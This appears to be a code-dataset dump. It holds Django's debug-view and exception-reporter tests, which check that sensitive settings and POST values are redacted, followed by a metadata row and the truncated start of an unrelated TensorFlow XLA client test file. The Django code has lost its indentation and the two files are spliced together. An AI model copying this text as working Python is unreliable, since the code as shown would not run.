def test_template_exceptions(self):
try:
self.client.get(reverse('template_exception'))
except Exception:
raising_loc = inspect.trace()[-1][-2][0].strip()
self.assertNotEqual(
raising_loc.find("raise Exception('boom')"), -1,
"Failed to find 'raise Exception' in last frame of "
"traceback, instead found: %s" % raising_loc
)
def test_template_loader_postmortem(self):
"""Tests for not existing file"""
template_name = "notfound.html"
with tempfile.NamedTemporaryFile(prefix=template_name) as tmpfile:
tempdir = os.path.dirname(tmpfile.name)
template_path = os.path.join(tempdir, template_name)
with override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [tempdir],
}]):
response = self.client.get(reverse('raises_template_does_not_exist', kwargs={"path": template_name}))
self.assertContains(response, "%s (Source does not exist)" % template_path, status_code=500, count=2)
# Assert as HTML.
self.assertContains(
response,
'<li><code>django.template.loaders.filesystem.Loader</code>: '
'%s (Source does not exist)</li>' % os.path.join(tempdir, 'notfound.html'),
status_code=500,
html=True,
)
def test_no_template_source_loaders(self):
"""
Make sure if you don't specify a template, the debug view doesn't blow up.
"""
with self.assertRaises(TemplateDoesNotExist):
self.client.get('/render_no_template/')
@override_settings(ROOT_URLCONF='view_tests.default_urls')
def test_default_urlconf_template(self):
"""
        Make sure that the default URLconf template is shown instead
of the technical 404 page, if the user has not altered their
URLconf yet.
"""
response = self.client.get('/')
self.assertContains(
response,
"<h2>Congratulations on your first Django-powered page.</h2>"
)
@override_settings(ROOT_URLCONF='view_tests.regression_21530_urls')
def test_regression_21530(self):
"""
Regression test for bug #21530.
If the admin app include is replaced with exactly one url
pattern, then the technical 404 template should be displayed.
The bug here was that an AttributeError caused a 500 response.
"""
response = self.client.get('/')
self.assertContains(
response,
"Page not found <span>(404)</span>",
status_code=404
)
class DebugViewQueriesAllowedTests(SimpleTestCase):
# May need a query to initialize MySQL connection
allow_database_queries = True
def test_handle_db_exception(self):
"""
Ensure the debug view works when a database exception is raised by
performing an invalid query and passing the exception to the debug view.
"""
with connection.cursor() as cursor:
try:
cursor.execute('INVALID SQL')
except DatabaseError:
exc_info = sys.exc_info()
rf = RequestFactory()
response = technical_500_response(rf.get('/'), *exc_info)
self.assertContains(response, 'OperationalError at /', status_code=500)
@override_settings(
DEBUG=True,
ROOT_URLCONF='view_tests.urls',
# No template directories are configured, so no templates will be found.
TEMPLATES=[{
'BACKEND': 'django.template.backends.dummy.TemplateStrings',
}],
)
class NonDjangoTemplatesDebugViewTests(SimpleTestCase):
def test_400(self):
# When DEBUG=True, technical_500_template() is called.
with patch_logger('django.security.SuspiciousOperation', 'error'):
response = self.client.get('/raises400/')
self.assertContains(response, '<div class="context" id="', status_code=400)
def test_403(self):
response = self.client.get('/raises403/')
self.assertContains(response, '<h1>403 Forbidden</h1>', status_code=403)
def test_404(self):
response = self.client.get('/raises404/')
self.assertEqual(response.status_code, 404)
def test_template_not_found_error(self):
# Raises a TemplateDoesNotExist exception and shows the debug view.
url = reverse('raises_template_does_not_exist', kwargs={"path": "notfound.html"})
response = self.client.get(url)
self.assertContains(response, '<div class="context" id="', status_code=500)
class ExceptionReporterTests(SimpleTestCase):
rf = RequestFactory()
def test_request_and_exception(self):
"A simple exception report can be generated"
try:
request = self.rf.get('/test_view/')
request.user = User()
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('<h1>ValueError at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">Can't find my keys</pre>', html)
self.assertIn('<th>Request Method:</th>', html)
self.assertIn('<th>Request URL:</th>', html)
self.assertIn('<h3 id="user-info">USER</h3>', html)
self.assertIn('<p>jacob</p>', html)
self.assertIn('<th>Exception Type:</th>', html)
self.assertIn('<th>Exception Value:</th>', html)
self.assertIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertNotIn('<p>Request data not supplied</p>', html)
def test_no_request(self):
"An exception report can be generated without request"
try:
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('<h1>ValueError</h1>', html)
self.assertIn('<pre class="exception_value">Can't find my keys</pre>', html)
self.assertNotIn('<th>Request Method:</th>', html)
self.assertNotIn('<th>Request URL:</th>', html)
self.assertNotIn('<h3 id="user-info">USER</h3>', html)
self.assertIn('<th>Exception Type:</th>', html)
self.assertIn('<th>Exception Value:</th>', html)
self.assertIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertIn('<p>Request data not supplied</p>', html)
def test_eol_support(self):
"""The ExceptionReporter supports Unix, Windows and Macintosh EOL markers"""
LINES = list('print %d' % i for i in range(1, 6))
reporter = ExceptionReporter(None, None, None, None)
for newline in ['\n', '\r\n', '\r']:
fd, filename = tempfile.mkstemp(text=False)
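            # mkstemp(text=False) opens the file in binary mode, so each EOL marker is written verbatim.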
os.write(fd, force_bytes(newline.join(LINES) + newline))
os.close(fd)
try:
self.assertEqual(
reporter._get_lines_from_file(filename, 3, 2),
(1, LINES[1:3], LINES[3], LINES[4:])
)
finally:
os.unlink(filename)
def test_no_exception(self):
"An exception report can be generated for just a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertIn('<h1>Report at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">No exception message supplied</pre>', html)
self.assertIn('<th>Request Method:</th>', html)
self.assertIn('<th>Request URL:</th>', html)
self.assertNotIn('<th>Exception Type:</th>', html)
self.assertNotIn('<th>Exception Value:</th>', html)
self.assertNotIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertNotIn('<p>Request data not supplied</p>', html)
def test_reporting_of_nested_exceptions(self):
request = self.rf.get('/test_view/')
try:
try:
raise AttributeError('Top level')
except AttributeError as explicit:
try:
raise ValueError('Second exception') from explicit
except ValueError:
raise IndexError('Final exception')
except Exception:
# Custom exception handler, just pass it into ExceptionReporter
exc_type, exc_value, tb = sys.exc_info()
explicit_exc = 'The above exception ({0}) was the direct cause of the following exception:'
implicit_exc = 'During handling of the above exception ({0}), another exception occurred:'
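            # 'raise ... from' sets __cause__ (explicit chaining); raising inside an
            # except block sets __context__ (implicit chaining).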
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
# Both messages are twice on page -- one rendered as html,
# one as plain text (for pastebin)
self.assertEqual(2, html.count(explicit_exc.format("Top level")))
self.assertEqual(2, html.count(implicit_exc.format("Second exception")))
text = reporter.get_traceback_text()
self.assertIn(explicit_exc.format("Top level"), text)
self.assertIn(implicit_exc.format("Second exception"), text)
def test_request_and_message(self):
"A message can be provided in addition to a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, "I'm a little teapot", None)
html = reporter.get_traceback_html()
self.assertIn('<h1>Report at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">I'm a little teapot</pre>', html)
self.assertIn('<th>Request Method:</th>', html)
self.assertIn('<th>Request URL:</th>', html)
self.assertNotIn('<th>Exception Type:</th>', html)
self.assertNotIn('<th>Exception Value:</th>', html)
self.assertNotIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertNotIn('<p>Request data not supplied</p>', html)
def test_message_only(self):
reporter = ExceptionReporter(None, None, "I'm a little teapot", None)
html = reporter.get_traceback_html()
self.assertIn('<h1>Report</h1>', html)
self.assertIn('<pre class="exception_value">I'm a little teapot</pre>', html)
self.assertNotIn('<th>Request Method:</th>', html)
self.assertNotIn('<th>Request URL:</th>', html)
self.assertNotIn('<th>Exception Type:</th>', html)
self.assertNotIn('<th>Exception Value:</th>', html)
self.assertNotIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertIn('<p>Request data not supplied</p>', html)
def test_non_utf8_values_handling(self):
"Non-UTF-8 exceptions/values should not make the output generation choke."
try:
class NonUtf8Output(Exception):
def __repr__(self):
return b'EXC\xe9EXC'
somevar = b'VAL\xe9VAL' # NOQA
raise NonUtf8Output()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('VAL\\xe9VAL', html)
self.assertIn('EXC\\xe9EXC', html)
def test_unprintable_values_handling(self):
"Unprintable values should not make the output generation choke."
try:
class OomOutput:
def __repr__(self):
raise MemoryError('OOM')
oomvalue = OomOutput() # NOQA
raise ValueError()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('<td class="code"><pre>Error in formatting', html)
def test_too_large_values_handling(self):
"Large values should not create a large HTML."
large = 256 * 1024
repr_of_str_adds = len(repr(''))
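        # repr('') == "''", so this accounts for the two quote characters repr() adds around the string.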
try:
class LargeOutput:
def __repr__(self):
return repr('A' * large)
largevalue = LargeOutput() # NOQA
raise ValueError()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertEqual(len(html) // 1024 // 128, 0) # still fit in 128Kb
self.assertIn('<trimmed %d bytes string>' % (large + repr_of_str_adds,), html)
def test_unfrozen_importlib(self):
"""
importlib is not a frozen app, but its loader thinks it's frozen which
results in an ImportError. Refs #21443.
"""
try:
request = self.rf.get('/test_view/')
importlib.import_module('abc.def.invalid.name')
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
        self.assertIn('<h1>%sError at /test_view/</h1>' % ('ModuleNotFound' if PY36 else 'Import'), html)
def test_ignore_traceback_evaluation_exceptions(self):
"""
Don't trip over exceptions generated by crafted objects when
evaluating them while cleansing (#24455).
"""
class BrokenEvaluation(Exception):
pass
def broken_setup():
raise BrokenEvaluation
request = self.rf.get('/test_view/')
broken_lazy = SimpleLazyObject(broken_setup)
try:
bool(broken_lazy)
except BrokenEvaluation:
exc_type, exc_value, tb = sys.exc_info()
self.assertIn(
"BrokenEvaluation",
ExceptionReporter(request, exc_type, exc_value, tb).get_traceback_html(),
"Evaluation exception reason not mentioned in traceback"
)
@override_settings(ALLOWED_HOSTS='example.com')
def test_disallowed_host(self):
"An exception report can be generated even for a disallowed host."
request = self.rf.get('/', HTTP_HOST='evil.com')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertIn("http://evil.com/", html)
def test_request_with_items_key(self):
"""
An exception report can be generated for requests with 'items' in
request GET, POST, FILES, or COOKIES QueryDicts.
"""
value = '<td>items</td><td class="code"><pre>'Oops'</pre></td>'
# GET
request = self.rf.get('/test_view/?items=Oops')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML(value, html)
# POST
request = self.rf.post('/test_view/', data={'items': 'Oops'})
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML(value, html)
# FILES
fp = StringIO('filecontent')
request = self.rf.post('/test_view/', data={'name': 'filename', 'items': fp})
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML(
'<td>items</td><td class="code"><pre><InMemoryUploadedFile: '
'items (application/octet-stream)></pre></td>',
html
)
        # COOKIES
rf = RequestFactory()
rf.cookies['items'] = 'Oops'
request = rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML('<td>items</td><td class="code"><pre>'Oops'</pre></td>', html)
def test_exception_fetching_user(self):
"""
The error page can be rendered if the current user can't be retrieved
(such as when the database is unavailable).
"""
class ExceptionUser:
def __str__(self):
raise Exception()
request = self.rf.get('/test_view/')
request.user = ExceptionUser()
try:
raise ValueError('Oops')
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('<h1>ValueError at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">Oops</pre>', html)
self.assertIn('<h3 id="user-info">USER</h3>', html)
self.assertIn('<p>[unable to retrieve the current user]</p>', html)
text = reporter.get_traceback_text()
self.assertIn('USER: [unable to retrieve the current user]', text)
class PlainTextReportTests(SimpleTestCase):
rf = RequestFactory()
def test_request_and_exception(self):
"A simple exception report can be generated"
try:
request = self.rf.get('/test_view/')
request.user = User()
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
text = reporter.get_traceback_text()
self.assertIn('ValueError at /test_view/', text)
self.assertIn("Can't find my keys", text)
self.assertIn('Request Method:', text)
self.assertIn('Request URL:', text)
self.assertIn('USER: jacob', text)
self.assertIn('Exception Type:', text)
self.assertIn('Exception Value:', text)
self.assertIn('Traceback:', text)
self.assertIn('Request information:', text)
self.assertNotIn('Request data not supplied', text)
def test_no_request(self):
"An exception report can be generated without request"
try:
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
text = reporter.get_traceback_text()
self.assertIn('ValueError', text)
self.assertIn("Can't find my keys", text)
self.assertNotIn('Request Method:', text)
self.assertNotIn('Request URL:', text)
self.assertNotIn('USER:', text)
self.assertIn('Exception Type:', text)
self.assertIn('Exception Value:', text)
self.assertIn('Traceback:', text)
self.assertIn('Request data not supplied', text)
def test_no_exception(self):
"An exception report can be generated for just a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
reporter.get_traceback_text()
def test_request_and_message(self):
"A message can be provided in addition to a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, "I'm a little teapot", None)
reporter.get_traceback_text()
def test_request_with_items_key(self):
"""
An exception report can be generated for requests with 'items' in
request GET, POST, FILES, or COOKIES QueryDicts.
"""
# GET
request = self.rf.get('/test_view/?items=Oops')
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("items = 'Oops'", text)
# POST
request = self.rf.post('/test_view/', data={'items': 'Oops'})
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("items = 'Oops'", text)
# FILES
fp = StringIO('filecontent')
request = self.rf.post('/test_view/', data={'name': 'filename', 'items': fp})
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn('items = <InMemoryUploadedFile:', text)
        # COOKIES
rf = RequestFactory()
rf.cookies['items'] = 'Oops'
request = rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("items = 'Oops'", text)
def test_message_only(self):
reporter = ExceptionReporter(None, None, "I'm a little teapot", None)
reporter.get_traceback_text()
@override_settings(ALLOWED_HOSTS='example.com')
def test_disallowed_host(self):
"An exception report can be generated even for a disallowed host."
request = self.rf.get('/', HTTP_HOST='evil.com')
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("http://evil.com/", text)
class ExceptionReportTestMixin:
# Mixin used in the ExceptionReporterFilterTests and
# AjaxResponseExceptionReporterFilter tests below
breakfast_data = {'sausage-key': 'sausage-value',
'baked-beans-key': 'baked-beans-value',
'hash-brown-key': 'hash-brown-value',
'bacon-key': 'bacon-value'}
def verify_unsafe_response(self, view, check_for_vars=True,
check_for_POST_params=True):
"""
        Asserts that potentially sensitive info is displayed in the response.
"""
request = self.rf.post('/some_url/', self.breakfast_data)
response = view(request)
if check_for_vars:
# All variables are shown.
self.assertContains(response, 'cooked_eggs', status_code=500)
self.assertContains(response, 'scrambled', status_code=500)
self.assertContains(response, 'sauce', status_code=500)
self.assertContains(response, 'worcestershire', status_code=500)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters are shown.
self.assertContains(response, k, status_code=500)
self.assertContains(response, v, status_code=500)
def verify_safe_response(self, view, check_for_vars=True,
check_for_POST_params=True):
"""
        Asserts that certain sensitive info is not displayed in the response.
"""
request = self.rf.post('/some_url/', self.breakfast_data)
response = view(request)
if check_for_vars:
# Non-sensitive variable's name and value are shown.
self.assertContains(response, 'cooked_eggs', status_code=500)
self.assertContains(response, 'scrambled', status_code=500)
# Sensitive variable's name is shown but not its value.
self.assertContains(response, 'sauce', status_code=500)
self.assertNotContains(response, 'worcestershire', status_code=500)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters' names are shown.
self.assertContains(response, k, status_code=500)
# Non-sensitive POST parameters' values are shown.
self.assertContains(response, 'baked-beans-value', status_code=500)
self.assertContains(response, 'hash-brown-value', status_code=500)
# Sensitive POST parameters' values are not shown.
self.assertNotContains(response, 'sausage-value', status_code=500)
self.assertNotContains(response, 'bacon-value', status_code=500)
def verify_paranoid_response(self, view, check_for_vars=True,
check_for_POST_params=True):
"""
Asserts that no variables or POST parameters are displayed in the response.
"""
request = self.rf.post('/some_url/', self.breakfast_data)
response = view(request)
if check_for_vars:
# Show variable names but not their values.
self.assertContains(response, 'cooked_eggs', status_code=500)
self.assertNotContains(response, 'scrambled', status_code=500)
self.assertContains(response, 'sauce', status_code=500)
self.assertNotContains(response, 'worcestershire', status_code=500)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters' names are shown.
self.assertContains(response, k, status_code=500)
# No POST parameters' values are shown.
self.assertNotContains(response, v, status_code=500)
def verify_unsafe_email(self, view, check_for_POST_params=True):
"""
        Asserts that potentially sensitive info is displayed in the email report.
"""
with self.settings(ADMINS=[('Admin', '[email protected]')]):
mail.outbox = [] # Empty outbox
request = self.rf.post('/some_url/', self.breakfast_data)
view(request)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
            # Frame vars are never shown in plain text email reports.
body_plain = str(email.body)
self.assertNotIn('cooked_eggs', body_plain)
self.assertNotIn('scrambled', body_plain)
self.assertNotIn('sauce', body_plain)
self.assertNotIn('worcestershire', body_plain)
            # Frame vars are shown in HTML email reports.
body_html = str(email.alternatives[0][0])
self.assertIn('cooked_eggs', body_html)
self.assertIn('scrambled', body_html)
self.assertIn('sauce', body_html)
self.assertIn('worcestershire', body_html)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters are shown.
self.assertIn(k, body_plain)
self.assertIn(v, body_plain)
self.assertIn(k, body_html)
self.assertIn(v, body_html)
def verify_safe_email(self, view, check_for_POST_params=True):
"""
        Asserts that certain sensitive info is not displayed in the email report.
"""
with self.settings(ADMINS=[('Admin', '[email protected]')]):
mail.outbox = [] # Empty outbox
request = self.rf.post('/some_url/', self.breakfast_data)
view(request)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
            # Frame vars are never shown in plain text email reports.
body_plain = str(email.body)
self.assertNotIn('cooked_eggs', body_plain)
self.assertNotIn('scrambled', body_plain)
self.assertNotIn('sauce', body_plain)
self.assertNotIn('worcestershire', body_plain)
            # Frame vars are shown in HTML email reports.
body_html = str(email.alternatives[0][0])
self.assertIn('cooked_eggs', body_html)
self.assertIn('scrambled', body_html)
self.assertIn('sauce', body_html)
self.assertNotIn('worcestershire', body_html)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters' names are shown.
self.assertIn(k, body_plain)
# Non-sensitive POST parameters' values are shown.
self.assertIn('baked-beans-value', body_plain)
self.assertIn('hash-brown-value', body_plain)
self.assertIn('baked-beans-value', body_html)
self.assertIn('hash-brown-value', body_html)
# Sensitive POST parameters' values are not shown.
self.assertNotIn('sausage-value', body_plain)
self.assertNotIn('bacon-value', body_plain)
self.assertNotIn('sausage-value', body_html)
self.assertNotIn('bacon-value', body_html)
def verify_paranoid_email(self, view):
"""
Asserts that no variables or POST parameters are displayed in the email report.
"""
with self.settings(ADMINS=[('Admin', '[email protected]')]):
mail.outbox = [] # Empty outbox
request = self.rf.post('/some_url/', self.breakfast_data)
view(request)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
            # Frame vars are never shown in plain text email reports.
body = str(email.body)
self.assertNotIn('cooked_eggs', body)
self.assertNotIn('scrambled', body)
self.assertNotIn('sauce', body)
self.assertNotIn('worcestershire', body)
for k, v in self.breakfast_data.items():
# All POST parameters' names are shown.
self.assertIn(k, body)
# No POST parameters' values are shown.
self.assertNotIn(v, body)
@override_settings(ROOT_URLCONF='view_tests.urls')
class ExceptionReporterFilterTests(ExceptionReportTestMixin, LoggingCaptureMixin, SimpleTestCase):
"""
Sensitive information can be filtered out of error reports (#14614).
"""
rf = RequestFactory()
def test_non_sensitive_request(self):
"""
        Everything (request info and frame variables) can be seen
in the default error reports for non-sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(non_sensitive_view)
self.verify_unsafe_email(non_sensitive_view)
with self.settings(DEBUG=False):
self.verify_unsafe_response(non_sensitive_view)
self.verify_unsafe_email(non_sensitive_view)
def test_sensitive_request(self):
"""
Sensitive POST parameters and frame variables cannot be
seen in the default error reports for sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_view)
self.verify_unsafe_email(sensitive_view)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_view)
self.verify_safe_email(sensitive_view)
def test_paranoid_request(self):
"""
No POST parameters and frame variables can be seen in the
default error reports for "paranoid" requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(paranoid_view)
self.verify_unsafe_email(paranoid_view)
with self.settings(DEBUG=False):
self.verify_paranoid_response(paranoid_view)
self.verify_paranoid_email(paranoid_view)
def test_multivalue_dict_key_error(self):
"""
#21098 -- Sensitive POST parameters cannot be seen in the
        error reports if request.POST['nonexistent_key'] throws an error.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(multivalue_dict_key_error)
self.verify_unsafe_email(multivalue_dict_key_error)
with self.settings(DEBUG=False):
self.verify_safe_response(multivalue_dict_key_error)
self.verify_safe_email(multivalue_dict_key_error)
def test_custom_exception_reporter_filter(self):
"""
It's possible to assign an exception reporter filter to
the request to bypass the one set in DEFAULT_EXCEPTION_REPORTER_FILTER.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(custom_exception_reporter_filter_view)
self.verify_unsafe_email(custom_exception_reporter_filter_view)
with self.settings(DEBUG=False):
self.verify_unsafe_response(custom_exception_reporter_filter_view)
self.verify_unsafe_email(custom_exception_reporter_filter_view)
def test_sensitive_method(self):
"""
The sensitive_variables decorator works with object methods.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_method_view, check_for_POST_params=False)
self.verify_unsafe_email(sensitive_method_view, check_for_POST_params=False)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_method_view, check_for_POST_params=False)
self.verify_safe_email(sensitive_method_view, check_for_POST_params=False)
def test_sensitive_function_arguments(self):
"""
Sensitive variables don't leak in the sensitive_variables decorator's
frame, when those variables are passed as arguments to the decorated
function.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_args_function_caller)
self.verify_unsafe_email(sensitive_args_function_caller)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_args_function_caller, check_for_POST_params=False)
self.verify_safe_email(sensitive_args_function_caller, check_for_POST_params=False)
def test_sensitive_function_keyword_arguments(self):
"""
Sensitive variables don't leak in the sensitive_variables decorator's
frame, when those variables are passed as keyword arguments to the
decorated function.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_kwargs_function_caller)
self.verify_unsafe_email(sensitive_kwargs_function_caller)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_kwargs_function_caller, check_for_POST_params=False)
self.verify_safe_email(sensitive_kwargs_function_caller, check_for_POST_params=False)
def test_callable_settings(self):
"""
Callable settings should not be evaluated in the debug page (#21345).
"""
def callable_setting():
return "This should not be displayed"
with self.settings(DEBUG=True, FOOBAR=callable_setting):
response = self.client.get('/raises500/')
self.assertNotContains(response, "This should not be displayed", status_code=500)
def test_callable_settings_forbidding_to_set_attributes(self):
"""
        Callable settings that forbid setting attributes should not break
the debug page (#23070).
"""
class CallableSettingWithSlots:
__slots__ = []
def __call__(self):
return "This should not be displayed"
with self.settings(DEBUG=True, WITH_SLOTS=CallableSettingWithSlots()):
response = self.client.get('/raises500/')
self.assertNotContains(response, "This should not be displayed", status_code=500)
def test_dict_setting_with_non_str_key(self):
"""
A dict setting containing a non-string key should not break the
debug page (#12744).
"""
with self.settings(DEBUG=True, FOOBAR={42: None}):
response = self.client.get('/raises500/')
self.assertContains(response, 'FOOBAR', status_code=500)
def test_sensitive_settings(self):
"""
The debug page should not show some sensitive settings
(password, secret key, ...).
"""
sensitive_settings = [
'SECRET_KEY',
'PASSWORD',
'API_KEY',
'AUTH_TOKEN',
]
for setting in sensitive_settings:
with self.settings(DEBUG=True, **{setting: "should not be displayed"}):
response = self.client.get('/raises500/')
self.assertNotContains(response, 'should not be displayed', status_code=500)
def test_settings_with_sensitive_keys(self):
"""
The debug page should filter out some sensitive information found in
dict settings.
"""
sensitive_settings = [
'SECRET_KEY',
'PASSWORD',
'API_KEY',
'AUTH_TOKEN',
]
for setting in sensitive_settings:
FOOBAR = {
setting: "should not be displayed",
'recursive': {setting: "should not be displayed"},
}
with self.settings(DEBUG=True, FOOBAR=FOOBAR):
response = self.client.get('/raises500/')
self.assertNotContains(response, 'should not be displayed', status_code=500)
class AjaxResponseExceptionReporterFilter(ExceptionReportTestMixin, LoggingCaptureMixin, SimpleTestCase):
"""
Sensitive information can be filtered out of error reports.
    Here we specifically test the plain text 500 debug-only error page served
    when the request is detected as having been sent by JS code. We don't check
    for the (non)existence of frame vars in the traceback information section of
    the response content because we don't include them in these error pages.
Refs #14614.
"""
rf = RequestFactory(HTTP_X_REQUESTED_WITH='XMLHttpRequest')
def test_non_sensitive_request(self):
"""
        Request info can be seen in the default error reports for
non-sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(non_sensitive_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_unsafe_response(non_sensitive_view, check_for_vars=False)
def test_sensitive_request(self):
"""
Sensitive POST parameters cannot be seen in the default
error reports for sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_view, check_for_vars=False)
def test_paranoid_request(self):
"""
No POST parameters can be seen in the default error reports
for "paranoid" requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(paranoid_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_paranoid_response(paranoid_view, check_for_vars=False)
def test_custom_exception_reporter_filter(self):
"""
It's possible to assign an exception reporter filter to
the request to bypass the one set in DEFAULT_EXCEPTION_REPORTER_FILTER.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(custom_exception_reporter_filter_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_unsafe_response(custom_exception_reporter_filter_view, check_for_vars=False)
class HelperFunctionTests(SimpleTestCase):
def test_cleanse_setting_basic(self):
self.assertEqual(cleanse_setting('TEST', 'TEST'), 'TEST')
self.assertEqual(cleanse_setting('PASSWORD', 'super_secret'), CLEANSED_SUBSTITUTE)
def test_cleanse_setting_ignore_case(self):
self.assertEqual(cleanse_setting('password', 'super_secret'), CLEANSED_SUBSTITUTE)
def test_cleanse_setting_recurses_in_dictionary(self):
initial = {'login': 'cooper', 'password': 'secret'}
expected = {'login': 'cooper', 'password': CLEANSED_SUBSTITUTE}
self.assertEqual(cleanse_setting('SETTING_NAME', initial), expected)
| bsd-3-clause | -7,065,527,192,650,510,000 | 41.75 | 117 | 0.616501 | false |
xodus7/tensorflow | tensorflow/compiler/xla/python/xla_client_test.py | 6 | 57359 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import threading
import numpy as np
from tensorflow.compiler.xla.python import xla_client
import unittest
class LocalComputationTest(unittest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
return compiled_c.Execute(arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_allclose, c, arguments,
expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
